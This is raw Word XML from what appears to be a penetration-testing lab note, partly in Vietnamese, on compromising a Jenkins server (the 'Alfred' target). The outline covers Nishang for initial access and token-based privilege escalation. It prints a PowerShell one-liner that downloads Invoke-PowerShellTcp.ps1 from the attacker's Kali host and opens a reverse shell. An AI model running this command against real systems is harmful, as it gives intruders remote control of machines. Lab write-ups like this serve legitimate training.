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C973" w14:textId="1D681509" w:rsidR="007D539D" w:rsidRDefault="007D539D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Targets: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Jenkin (the most widely used automation server) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBB444" w14:textId="5EDC3E7C" w:rsidR="006B5895" w:rsidRDefault="006B5895">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">_Lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidR="004A44DD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow execution of commands on the underlying system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D5E12" w14:textId="296E7784" w:rsidR="007D539D" w:rsidRDefault="007D539D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Activities: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Gain initial shell through Nishang scripts, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">privilege escalation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through Windows authentication Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEBDA06" w14:textId="2C17CE34" w:rsidR="00991862" w:rsidRDefault="00991862">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284E794F" w14:textId="037F45AF" w:rsidR="00991862" w:rsidRDefault="00991862">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A03FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0F2F6" w14:textId="2B8DA464" w:rsidR="00991862" w:rsidRDefault="00991862">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003D4803">
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nishang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="001F693B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/samratashok/nishang</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00880C16">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00880C16">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-- gain initial access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E75828D" w14:textId="52986BF2" w:rsidR="00C153E2" w:rsidRDefault="00C153E2" w:rsidP="00C153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13AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-- Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E85350" w14:textId="6641EE7B" w:rsidR="00C153E2" w:rsidRDefault="00C153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13AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00535783">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Priv. Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CB399" w14:textId="464E621D" w:rsidR="00991862" w:rsidRDefault="00B728F9" w:rsidP="00CB04F2">
      <w:pPr>
        <w:ind w:left="3600" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4803">
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
      <w:r w:rsidR="00991862" w:rsidRPr="003D4803">
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse shell script:</w:t>
      </w:r>
      <w:r w:rsidR="00991862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D13AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB04F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="0092448F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Invoke-PowerShellTcp.ps1</w:t>
      </w:r>
      <w:r w:rsidR="00CB04F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00D13AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00D13AF3" w:rsidRPr="00217BA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="394C46BB" w14:textId="6515ADA8" w:rsidR="00991862" w:rsidRDefault="00991862">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB3E186" w14:textId="636E2027" w:rsidR="00991862" w:rsidRDefault="009918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1:</w:t>
      </w:r>
      <w:r w:rsidR="003877C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gain initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D457C8" w14:textId="7D2B5F6D" w:rsidR="003877C6" w:rsidRDefault="003877C6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Objective#1: </w:t>
      </w:r>
      <w:r w:rsidR="0071561C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit a feature in Alfred tool that allow hacker to execute </w:t>
      </w:r>
      <w:r w:rsidR="0071561C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="006E1EAC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071561C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>commands on the underlying system</w:t>
      </w:r>
      <w:r w:rsidR="00757B3B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C1E338" w14:textId="443FC484" w:rsidR="006E1ED3" w:rsidRPr="006E1ED3" w:rsidRDefault="006E1ED3" w:rsidP="006E1E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Gain reverse shell access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E7E8CD" w14:textId="10DD048F" w:rsidR="0071561C" w:rsidRDefault="0071561C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071561C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F9D9F0E" wp14:editId="005325C7">
            <wp:extent cx="594360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C9F5" w14:textId="7DDC4617" w:rsidR="0071561C" w:rsidRPr="005E0580" w:rsidRDefault="00945AE3" w:rsidP="0071561C">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:i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  <w:r w:rsidR="00DC2C15">
        <w:rPr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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0025009B" w:rsidRPr="005E0580">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00B47DB2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidR="0025009B" w:rsidRPr="005E0580">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E8C42E" w14:textId="16B13A3E" w:rsidR="0025009B" w:rsidRPr="00E02E4D" w:rsidRDefault="004B701C" w:rsidP="0071561C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>powershell iex (New-Object Net.WebClient).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0A59">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:highlight w:val="cyan"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DownloadString</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>('http://</w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kali_IP]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>your-port</w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0A59">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:highlight w:val="cyan"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Invoke-PowerShellTcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.ps1');</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0A59">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:highlight w:val="cyan"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Invoke-PowerShellTcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Reverse </w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">IPAddress </w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>your-ip</w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Port </w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>your-port</w:t>
      </w:r>
      <w:r w:rsidR="005E0580" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28141A7E" w14:textId="08194930" w:rsidR="00476881" w:rsidRPr="00476881" w:rsidRDefault="00476881" w:rsidP="0071561C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ví d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D7987" w14:textId="00DC133A" w:rsidR="00476881" w:rsidRPr="00E02E4D" w:rsidRDefault="00476881" w:rsidP="0071561C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>powershell iex (New-Object Net.WebClient).DownloadString('http://</w:t>
      </w:r>
      <w:r w:rsidR="00E02E4D" w:rsidRPr="00E02E4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E02E4D" w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10.18.27.67</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress </w:t>
      </w:r>
      <w:r w:rsidR="000F1EE4" w:rsidRPr="000F1EE4">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10.18.27.67</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02E4D">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Port </w:t>
      </w:r>
      <w:r w:rsidR="000F1EE4">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A3922" w14:textId="6B36BFD8" w:rsidR="004B701C" w:rsidRDefault="00B1754E" w:rsidP="007156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Force that server to download PowerShellTcp.ps1 from my Kali, and execute that script to create a reverse shell back to my Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6AA367" w14:textId="4C0B697A" w:rsidR="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="0071561C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDA5CF6" w14:textId="4977797B" w:rsidR="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="0071561C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2C15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C031B9A" wp14:editId="093A5CB6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>199000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>237783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4055745" cy="1517015"/>
            <wp:effectExtent l="0" t="0" r="190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en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">B2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C37C2" w14:textId="3EE2ABAF" w:rsidR="00DC2C15" w:rsidRPr="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E13244" w14:textId="12521E71" w:rsidR="00DC2C15" w:rsidRPr="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73669051" w14:textId="40BB6744" w:rsidR="00DC2C15" w:rsidRPr="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70756EA5" w14:textId="6422B310" w:rsidR="00DC2C15" w:rsidRPr="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223C6839" w14:textId="02770C68" w:rsidR="00DC2C15" w:rsidRPr="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C23A003" w14:textId="6DBE6FB3" w:rsidR="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD02A5A" w14:textId="6ACF53A9" w:rsidR="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2C15">
        <w:rPr>
